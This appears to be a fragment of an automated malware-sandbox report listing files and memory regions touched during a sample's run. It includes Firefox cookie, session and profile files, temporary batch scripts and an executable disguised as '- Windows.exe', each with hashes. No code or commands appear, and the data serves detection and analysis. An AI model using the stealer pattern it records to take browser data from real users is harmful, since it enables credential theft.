| SHA512 | 070358c3d6f5274f787df142c3c5f07a4ab2b08f1676685f2e9bf56dad64314cc8b8deb44ae2318ca64773b97fb9b79456ab244e6d82b392593e35e6b639a01e |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afevplna.default-release\cache2\doomed\29082
| MD5 | 0f909b3ea5eab02b499900f958a30b29 |
| SHA1 | e03173c18c5607b77621e5d084db1f2051438e22 |
| SHA256 | 20cdf5250fe3d5ab6d937e4d2eaae3b4a6ec2777a9264afc22ce386bc1762e35 |
| SHA512 | 4b6fcb67484a7d40396dcc5c3147e3ad3c0a6459cc8fcf4bf5a7210d09f2147e7f7ade56a3cd1e280485f75d5dc24895187acfda9f4d278d30da9aefce739932 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | f50cce07ab47052681b4f9e40efc4673 |
| SHA1 | 0384cc9b54a189e43f5de4d8512aea9d85497dc5 |
| SHA256 | b51595c5c1ba94b2d4b32ed4f16134899259dbec1f3fe5528f84f9b00374d302 |
| SHA512 | be44b0d3a8fd3d3c28501d44c684ef1097bec40de77e79502c4b83bea920620aa2f16bb4b5af2dd5779f17ba60f94648a920084004c11aae4dd514a406a68844 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\storage\default\https+++mega.nz\idb\3713173747_s_edmban.sqlite
| MD5 | c8338d78cbe62aa2e1c1d004ee88b7da |
| SHA1 | 0f9f84f5091b5bb0066d46911e06202827c8e92d |
| SHA256 | 33a1a571325fb6ec5b7b7f5c0fa1778468d5b37ab77ba8321938ef8c28932bef |
| SHA512 | 1e4620c21bc462e1fdd14d6189a66b68e501c77c804bef0fe6b561ac16104c9b03b081c5f82136482908054b1ec462f2de1309778e901b8517e48fd76199636a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\prefs-1.js
| MD5 | a13253eb91319b24f9f9cb0f913082f9 |
| SHA1 | 4af98bb2fd1305d4ed9ef4db14041da01ec2a987 |
| SHA256 | 3b95d4f87a1e4448f2057dcbb07f06a5b980357809c8d03a650ee294c2e4a1e7 |
| SHA512 | 20d505d496cf2ba6b7e00c64a23c0042424189b42cfdee449cdc2940fa84aa396486c035b8f7d2d974e6e428c76990d244176ead2f3eb9a1e0c23049537ba4e3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 45483cdc455e7cc416a3e1e7675d7674 |
| SHA1 | 2728070647108aee276b1d37ba57ace72761b57e |
| SHA256 | 4a18771c81876d97aa03728f0b1b4fdd68d24c5049278e31e06dd5c56d47f00a |
| SHA512 | 68998e0f260c4dc54f5081063779b492e6df411d1932faf40b9667617f9d23108a299fcc4718dd1fd1185ef548f352e17cdfc54aa2ecab6c60abb274647823c0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 0286cdf5c6bc3e49e2899cf26c27f983 |
| SHA1 | b244b5addbad7395b0e970d3899847cf7ed4dd1c |
| SHA256 | 3a4dfefd57c2272379fbb60026ebb6e511755c3ede9f3a5712aa66489f5b528b |
| SHA512 | ca0f2da3e861cde038b3c1bdf1407eab5084db2eac1600cb0ad8a12c99228e391b1a8aec7fd30cc20d123830a53eface4755301adfb030679fca225c5e1f01a0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore.jsonlz4
| MD5 | cdf7f4d4e87e40d01c3309721529c6c8 |
| SHA1 | 146816ef787fb7352f2a1db91d04dff3bbba01e6 |
| SHA256 | acae2b8d9390382728978503aba9705674df9e48cf8bc8c615bfff9eea707c13 |
| SHA512 | eb669c99660f572cd0604b3941b3cea1554644e0924af779c9b421fa04e2847f8912dd06892ebdf14af18329d8a425687124ee7fdfebea761d7f67c81839d79a |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxjfo1pk.zy1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1424-345-0x000002BB79D00000-0x000002BB79D22000-memory.dmp
memory/1424-350-0x000002BB79CF0000-0x000002BB79CF8000-memory.dmp
memory/1424-351-0x000002BB7A010000-0x000002BB7A0B2000-memory.dmp
memory/1424-352-0x000002BB79F80000-0x000002BB79FFC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\build.bat
| MD5 | c3a8464abf9fe7625215d938797b8e21 |
| SHA1 | 03db36c72e71a3c164b3570b0e6c5cb6a21efa5e |
| SHA256 | fa98b089863cf7714b49bfa4663c654efdb8b81812d0e9bde763d7597b43bf45 |
| SHA512 | 7237d7f8162315950af8643912388b3c9133445569b04b1ea7ba45559a5e860a0ff6641306b9f09240728a213b031225cddfe959a2e159f4aa4c7197dec1d5fe |
C:\Users\Admin\AppData\Local\Temp\Client.bat
| MD5 | 445174d4cd2d2cb63afadf078fe499a5 |
| SHA1 | 96e93f679b66c86a4516a92f49805e372a6f3aaa |
| SHA256 | 3cac34fe718eefafb30fcd2a443d1d919139371b35f5d42cd24ccf820b3baa1f |
| SHA512 | 77d79a932d52760a8712a4f548f249c47ff0878e06bba523fbdb74bf2f5112be204c2d9154b4cacfb8ffd0f72cd6fb84549ad39c813056b245558793733b6a5e |
memory/4468-363-0x00000000029F0000-0x0000000002A26000-memory.dmp
memory/4468-364-0x0000000005130000-0x0000000005758000-memory.dmp
memory/4468-365-0x0000000005030000-0x0000000005052000-memory.dmp
memory/4468-366-0x0000000005810000-0x0000000005876000-memory.dmp
memory/4468-367-0x0000000005880000-0x00000000058E6000-memory.dmp
memory/4468-377-0x00000000058F0000-0x0000000005C44000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3fec295448f33fc791f27798e231cfa1 |
| SHA1 | 40ba5b9773c7ff23002e2bbab326641ffd2da9ce |
| SHA256 | fd436b2a1294081023a388f41db9c5bd0489c5ffe5e5f76ee386e6783f8dbef6 |
| SHA512 | f9d6229318da887e1af67f8d3ea1e953eb016126c08adca91d6d2e4852bec7361388939ddce294754668630dfa5176eeca89c8eacb07722a00f3560a7da0bc08 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
memory/4468-389-0x0000000005DF0000-0x0000000005E0E000-memory.dmp
memory/4468-390-0x0000000005E20000-0x0000000005E6C000-memory.dmp
memory/5240-391-0x0000022144310000-0x0000022144318000-memory.dmp
memory/5240-392-0x000002215C770000-0x000002215C7C4000-memory.dmp
memory/5240-393-0x000002215C820000-0x000002215C884000-memory.dmp
memory/4468-394-0x00000000075A0000-0x0000000007C1A000-memory.dmp
memory/4468-395-0x0000000006F50000-0x0000000006F6A000-memory.dmp
memory/4468-396-0x0000000006F90000-0x0000000006F98000-memory.dmp
memory/4468-397-0x0000000007080000-0x000000000711C000-memory.dmp
memory/4468-398-0x00000000072C0000-0x00000000072E6000-memory.dmp
memory/4468-399-0x00000000072E0000-0x0000000007332000-memory.dmp
memory/4468-400-0x00000000081D0000-0x0000000008774000-memory.dmp
memory/4468-401-0x0000000007420000-0x00000000074B2000-memory.dmp
memory/4468-402-0x0000000004D60000-0x0000000004D6A000-memory.dmp
memory/4468-403-0x0000000008DA0000-0x00000000093B8000-memory.dmp
memory/4468-404-0x0000000007EF0000-0x0000000007FFA000-memory.dmp
memory/4468-405-0x0000000007530000-0x0000000007542000-memory.dmp
memory/4468-406-0x0000000007D10000-0x0000000007D4C000-memory.dmp
memory/4468-407-0x0000000007E90000-0x0000000007EE0000-memory.dmp
memory/4468-408-0x0000000008780000-0x0000000008942000-memory.dmp
memory/4468-409-0x00000000098F0000-0x0000000009E1C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\cookies.sqlite
| MD5 | 3e4d78b2d4126529c8f8ccff5754ec58 |
| SHA1 | 67af41889ccdcfb88ea5d1c29afda743ead57e1a |
| SHA256 | ec12ba6effc55ab75dca2817b0254f28335b96efcf7e5cf7b33d2bcea9bb90dc |
| SHA512 | 9a77fa45af95f36943020ef6953df202dc6c41734faf625a91e8b54eeb7220da82c2cfbb70cfc53cc167466eaa947abb358908447157bbb03ba33048d91a9c6f |
C:\Program Files\- Windows.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |